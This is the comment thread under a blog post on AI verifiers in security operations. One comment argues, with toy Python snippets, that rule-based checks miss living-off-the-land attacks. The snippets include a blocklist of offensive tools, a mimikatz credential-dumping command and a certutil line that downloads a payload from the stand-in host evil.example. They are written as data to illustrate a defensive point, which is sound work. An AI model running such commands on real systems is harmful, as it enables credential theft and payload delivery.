Discussion about this post

Matthias Muhlert

Sergej — thank you for writing this. The core reframing really lands: stop obsessing over "AI in the SOC" and start engineering verifiers. Your "Verifier's Law" setup, the offense-vs-defense oracle asymmetry, and the Sec-Gemini vs Project Ire contrast are unusually actionable. And yes: many defenders are still serving spaghetti alerts at machine speed.

That said, I'd like to broaden the discussion with a few boundary conditions — not to diminish the verifier roadmap (I think it's essential), but to clarify where it works brilliantly and where it may hit a hard limit.

1) The grammar problem: attackers don't just break rules — they weaponise them

Verification shines when "correct vs incorrect" is mechanically decidable. But modern attacker tradecraft is often grammatically correct while being semantically malicious.

Living-off-the-land, BEC, legitimate admin tooling misuse, valid auth flows, approved APIs — these pass rule-based checks because they aren't rule violations. They're rule exploitation. The attacker constructs "sentences" your grammar explicitly permits.

You can't enumerate your way to safety in a generative space. Verifiers work brilliantly for known attack classes — but the attacker's job is precisely to construct tomorrow's sentences your grammar didn't anticipate.
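To make the point concrete, here is a toy sketch (all tool names and the blocklist are illustrative, not from the post): a blocklist-style verifier cleanly rejects overtly malicious tooling, yet a living-off-the-land download through a signed OS utility sails through, because nothing about the "sentence" violates the grammar.

```python
# A minimal, illustrative rule-based verifier: it checks the launched
# binary against a blocklist of known-bad tool names.
BLOCKLIST = {"mimikatz.exe", "psexec.exe", "cobaltstrike.exe"}

def verify_process(command_line: str) -> bool:
    """Return True if the command line passes the rule-based check."""
    binary = command_line.split()[0].lower()
    return binary not in BLOCKLIST

# An overtly malicious tool fails the check, as intended:
assert verify_process("mimikatz.exe sekurlsa::logonpasswords") is False

# But a living-off-the-land download via a legitimate, signed OS
# utility passes, because it exploits the rules rather than breaking them:
assert verify_process("certutil.exe -urlcache -f http://evil.example/p.bin p.bin") is True
```

The decisive property here is intent (why certutil is fetching that file), which no syntactic check over the command line can recover.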

So the question becomes: what do we do when the decisive property is intent, not syntax?

2) Quis custodiet: the recursion doesn't resolve — it moves up a layer

Even when we anchor to "mechanical ground truth," every verifier encodes assumptions: what counts as evidence, what thresholds mean, what threat model is implied, what the validator is allowed to ignore.

At scale, the risk isn't only hallucination — it's institutionalised false certainty, where verifier blind spots become invisible because "the system verified it." We don't eliminate trust; we relocate it into the verifier stack, which then becomes part of the attack surface.

A practical extension of your thesis: we need verification for the verifiers — continuous adversarial testing of oracles, explicit "oracle threat models," and metrics for verifier drift and brittleness (not only detector accuracy).
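One way such a brittleness metric could look, as a hedged sketch (the verifier, perturbation set, and scoring are all toy assumptions of mine, not an established standard): replay known-malicious samples plus small perturbations of each, and score the fraction of perturbed variants whose verdict flips.

```python
# Sketch of "red-teaming the oracle": measure verifier brittleness as
# the fraction of perturbed variants whose verdict differs from the
# verdict on the unperturbed sample.
from typing import Callable, Iterable, List

def brittleness(verifier: Callable[[str], bool],
                samples: Iterable[str],
                perturb: Callable[[str], List[str]]) -> float:
    flips = total = 0
    for sample in samples:
        baseline = verifier(sample)
        for variant in perturb(sample):
            total += 1
            if verifier(variant) != baseline:
                flips += 1
    return flips / total if total else 0.0

# Toy verifier: flags any command containing the literal substring "evil".
toy_verifier = lambda cmd: "evil" in cmd

# Toy perturbations: a case change and benign padding.
perturb = lambda cmd: [cmd.upper(), cmd + " --verbose"]

score = brittleness(toy_verifier, ["fetch http://evil.example"], perturb)
# The case change flips the verdict (the substring match is
# case-sensitive); the padding does not, so score == 0.5 here.
```

A verifier whose score drifts upward over time is telling you its blind spots are growing, independently of any detector-accuracy number.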

3) Autonomy changes the math (L1–L2 is not L4–L5)

Your framework is extremely strong for L1–L2 autonomy (assistive AI), where humans remain the trust anchor and verifiers improve throughput.

But at higher autonomy levels — autonomous defenders facing autonomous attackers — the defender must adapt its verification criteria under adversarial pressure, in real time, while the attacker probes those very criteria. Verification doesn't scale linearly with autonomy; it becomes existential.

This raises a question we don't ask enough: what does defensive AI architecture look like when verification itself becomes the attack surface?

A complementary corollary

I love your line "who owns the verifiers wins the AI race." I'd add:

- Where verification is possible, verifiers are decisive. Build the gyms.

- Where verification is fundamentally ambiguous, resilience becomes decisive.

Meaning: pair the verifier roadmap with architectures that assume oracle failure and stay safe anyway:

- Micro-segmentation as consequence bounding — even if detection fails, lateral movement is constrained

- Immutable infrastructure — instead of verifying compromise, assume it and replace on schedule; recovery speed beats detection accuracy

- Cryptographic compartmentalisation — make exfiltration less consequential, not merely more detectable

Not "detection vs prevention," but verification + survivability. The answer to oracle asymmetry might not be "build better oracles," but "design systems where oracle failure is survivable."
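The first bullet above can be sketched in a few lines (segment names and the flow table are purely illustrative): micro-segmentation as a deny-by-default reachability policy, so the blast radius of a compromised host is bounded even when detection has already failed.

```python
# Micro-segmentation as consequence bounding: connectivity is
# deny-by-default, and only explicitly allowed flows succeed.
# Segment names here are illustrative placeholders.
ALLOWED_FLOWS = {
    ("web", "app"),
    ("app", "db"),
}

def can_reach(src_segment: str, dst_segment: str) -> bool:
    """Deny-by-default: a flow succeeds only if explicitly allowed."""
    return (src_segment, dst_segment) in ALLOWED_FLOWS

# Even with a fully compromised web tier (i.e. the oracle has already
# failed), lateral movement to the database segment is constrained:
assert can_reach("web", "app") is True
assert can_reach("web", "db") is False
```

No verification verdict is consulted here at all, which is the point: the property holds under oracle failure.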

Two questions if you extend this

1) Which parts of the semantic/intent layer do you think can be pulled into verifiable territory — and which remain irreducibly judgmental?

2) Do we need an explicit "verifier stack security" discipline (threat modelling and red-teaming the oracles themselves) as a first-class capability?

Looking forward to continuing this conversation — perhaps over coffee at the next conference.

—Matthias

Kevin R.

Great post, Sergej. Counter-Strike was also my first exposure to programming, so it was really fun to read about your experience with the neural network bots! It makes perfect sense to tie AI use cases to outcomes that are easy to verify. This is the way forward.
